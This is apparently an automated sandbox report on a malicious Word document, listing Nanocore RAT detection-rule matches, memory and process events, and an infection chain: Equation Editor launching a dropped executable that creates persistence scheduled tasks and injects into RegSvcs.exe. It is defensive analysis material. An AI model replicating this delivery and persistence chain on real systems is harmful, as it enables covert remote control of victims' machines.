Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FE468	4_2_006FE468
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FDC20	4_2_006FDC20
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F0200	4_2_006F0200
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FEEF8	4_2_006FEEF8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F42D8	4_2_006F42D8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FB2B8	4_2_006FB2B8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FE88A	4_2_006FE88A
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F4698	4_2_006F4698
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F6692	4_2_006F6692
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F7490	4_2_006F7490
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FB740	4_2_006FB740
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F5D58	4_2_006F5D58
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FDFCC	4_2_006FDFCC
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F3D88	4_2_006F3D88
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F4A40	4_2_006F4A40
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FE457	4_2_006FE457
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FF229	4_2_006FF229
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FF238	4_2_006FF238
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F8E38	4_2_006F8E38
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FC000	4_2_006FC000
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FDC11	4_2_006FDC11
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FC010	4_2_006FC010
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FEEE8	4_2_006FEEE8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FAAD8	4_2_006FAAD8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FCC8A	4_2_006FCC8A
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FAA80	4_2_006FAA80
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FCC90	4_2_006FCC90
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9368	4_2_006F9368
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9140	4_2_006F9140
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9358	4_2_006F9358
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9150	4_2_006F9150
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9738	4_2_006F9738
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F3FE8	4_2_006F3FE8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F61C8	4_2_006F61C8
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FD1D0	4_2_006FD1D0
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FC5B0	4_2_006FC5B0
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FB9B0	4_2_006FB9B0
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F958A	4_2_006F958A
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F8189	4_2_006F8189
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F8198	4_2_006F8198
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006F9598	4_2_006F9598
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_006FC594	4_2_006FC594
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00763DFF	8_2_00763DFF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00765AD1	8_2_00765AD1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00452418	8_2_00452418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004538C8	8_2_004538C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00459988	8_2_00459988
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00458D88	8_2_00458D88
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0045B658	8_2_0045B658
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00453020	8_2_00453020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004530E7	8_2_004530E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_00459A4F	8_2_00459A4F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_0045A230	8_2_0045A230

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_01D01ECA NtQuerySystemInformation,	4_2_01D01ECA
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_01D01E90 NtQuerySystemInformation,	4_2_01D01E90
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D16DA NtQuerySystemInformation,	8_2_004D16DA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D169F NtQuerySystemInformation,	8_2_004D169F

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: plugmanzx[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: plugmangd5693.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: RWbqWnnjDWI.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: PO-14092021.doc	Virustotal: Detection: 27%
Source: PO-14092021.doc	ReversingLabs: Detection: 20%

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.R.:. ...................................................................8...............................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................................E.R.R.O.(.P.............................................................................X.......................	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................`.......................(.P.....T.......................A.................................................................*.....	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ................ .......................(.P.....X.........................................................................................$.....	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\plugmangd5693.exe C:\Users\user\AppData\Roaming\plugmangd5693.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0	Jump to behavior

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_01D01DFA AdjustTokenPrivileges,	4_2_01D01DFA
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Code function: 4_2_01D01DC3 AdjustTokenPrivileges,	4_2_01D01DC3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D149A AdjustTokenPrivileges,	8_2_004D149A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 8_2_004D1463 AdjustTokenPrivileges,	8_2_004D1463

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$-14092021.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD9E9.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@20/15@7/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{252c9db9-aa04-46ee-b18e-f50ea5b00a3e}
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Mutant created: \Sessions\1\BaseNamedObjects\tpartidvAVXOECPsSL
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File created: C:\Program Files (x86)\SMTP Service

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
